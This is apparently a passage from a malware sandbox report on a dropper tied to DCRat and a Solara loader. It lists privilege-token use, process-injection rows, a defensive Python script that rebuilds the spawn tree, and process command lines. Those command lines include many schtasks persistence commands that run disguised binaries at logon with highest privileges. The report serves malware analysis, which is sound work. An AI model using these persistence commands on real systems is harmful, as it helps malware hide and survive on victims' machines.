N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 4476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 4476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe
PID 4476 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 4476 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
PID 2408 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\system32\schtasks.exe
PID 2408 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\system32\schtasks.exe
PID 2408 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\system32\schtasks.exe
PID 2408 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2408 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2408 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
PID 2408 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2408 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
PID 2408 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2408 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 2408 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe
PID 3604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 3604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 3604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe
PID 4912 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 4912 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 4912 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 4912 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Windows\system32\schtasks.exe
PID 4912 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Windows\system32\schtasks.exe
PID 4912 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Windows\system32\schtasks.exe
PID 3600 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 3600 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 3600 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\Frage build.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\solara.exe C:\Windows\SysWOW64\WScript.exe
PID 2272 wrote to memory of 2716 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2272 wrote to memory of 2716 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2272 wrote to memory of 2716 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 3112 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
PID 2716 wrote to memory of 3112 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
PID 2616 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 2616 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 2616 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe
PID 4492 wrote to memory of 2416 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 4492 wrote to memory of 2416 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 4492 wrote to memory of 4856 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4492 wrote to memory of 4856 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4492 wrote to memory of 4856 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3112 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 3288 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\system32\schtasks.exe
PID 3112 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\system32\schtasks.exe
PID 3112 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 764 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 764 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
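The WriteProcessMemory rows above are the clearest record of the spawn chain (sample.exe writes into Youtube.exe and sddsfsdf.exe, Youtube.exe into DCRatBuild.exe, Frage build.exe and schtasks.exe, and so on), but two properties of the table trip up a naive parent/child join: the same write is logged two or three times, and the sandbox reuses PIDs once a process exits, so 4912 is schtasks.exe in one row and Result.exe in a later one, and 2632 is likewise schtasks.exe and then solara.exe. The script below is an added example written for this report, not sandbox code; it keys nodes on (pid, image) rather than pid alone, drops repeated rows, treats anything never seen as a child as a root, and reports recycled PIDs. The sample rows are a subset transcribed from the table above.

```python
"""Rebuild the spawn tree from a sandbox report's WriteProcessMemory rows.

Added example for this report; not sandbox code. Nodes are keyed on
(pid, image) because the sandbox recycles PIDs after a process exits."""
import re
from collections import OrderedDict
from pathlib import PureWindowsPath
from typing import Dict, Iterator, List, Tuple

Node = Tuple[int, str]  # (pid, image path)

# One report row: parent PID, child PID, parent image, child image, trailing N/A target column.
ROW_RE = re.compile(
    r"^PID (?P<ppid>\d+) wrote to memory of (?P<cpid>\d+) N/A "
    r"(?P<parent>.+?\.exe) (?P<child>[A-Za-z]:\\.+?\.exe) N/A$"
)

# Constructed sample: a subset of this report's rows, including a duplicate and the PID 4912 reuse.
SAMPLE_ROWS = [
    r"PID 4476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A",
    r"PID 4476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A",
    r"PID 4476 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A",
    r"PID 2408 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Windows\system32\schtasks.exe N/A",
    r"PID 2408 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A",
    r"PID 2408 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\Youtube.exe C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A",
    r"PID 3604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe C:\Windows\SysWOW64\WScript.exe N/A",
    r"PID 4912 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Result.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A",
    r"PID 2616 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe C:\Windows\SysWOW64\msiexec.exe N/A",
]


def parse_rows(rows) -> Iterator[Tuple[Node, Node]]:
    """Yield (parent, child) edges in report order, dropping repeated rows."""
    seen = set()
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue
        edge = ((int(m["ppid"]), m["parent"]), (int(m["cpid"]), m["child"]))
        if edge not in seen:
            seen.add(edge)
            yield edge


def build_tree(rows) -> Tuple[Dict[Node, List[Node]], List[Node]]:
    """Return (children, roots). Roots are nodes never seen as a child: the
    original sample plus any process whose own spawn the table did not capture."""
    children: Dict[Node, List[Node]] = OrderedDict()
    child_nodes = set()
    for parent, child in parse_rows(rows):
        children.setdefault(parent, []).append(child)
        children.setdefault(child, [])
        child_nodes.add(child)
    roots = [n for n in children if n not in child_nodes]
    return children, roots


def pid_reuse(children: Dict[Node, List[Node]]) -> Dict[int, List[str]]:
    """PIDs that appear with more than one image: the sandbox recycled them."""
    images: Dict[int, set] = {}
    for pid, image in children:
        images.setdefault(pid, set()).add(image)
    return {pid: sorted(imgs) for pid, imgs in images.items() if len(imgs) > 1}


def render(children: Dict[Node, List[Node]], roots: List[Node]) -> str:
    """Indented text tree, one line per (pid, image) node."""
    lines: List[str] = []

    def walk(node: Node, depth: int) -> None:
        pid, image = node
        lines.append("  " * depth + f"{PureWindowsPath(image).name} (pid {pid})")
        for child in children[node]:
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return "\n".join(lines)


if __name__ == "__main__":
    children, roots = build_tree(SAMPLE_ROWS)
    print(render(children, roots))
    print("reused PIDs:", pid_reuse(children))
```

With the sample rows, Result.exe (pid 4912) comes out as a second root: no row shows a parent writing into it, so its spawn has to be taken from the Processes listing rather than from this table. The same code will also accept the full table copied out of the report.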

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe

"C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe"

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"

C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe

"C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"

C:\Users\Admin\AppData\Local\Temp\Result.exe

"C:\Users\Admin\AppData\Local\Temp\Result.exe"

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Users\Admin\AppData\Local\Temp\solara.exe

"C:\Users\Admin\AppData\Local\Temp\solara.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\SysWOW64\msiexec.exe

"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 7F6EF5A27D212CCB16D49156F8B9A446

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 308240B41C6B2B581EDDC761FDFE78B6

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\msiexec.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Videos\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Admin\Videos\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Videos\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office\Office16\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office16\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office\Office16\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Templates\msiexec.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Users\All Users\Templates\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Templates\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Users\Public\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Public\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Users\Public\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\winNet\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\winNet\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\winNet\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Start Menu\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

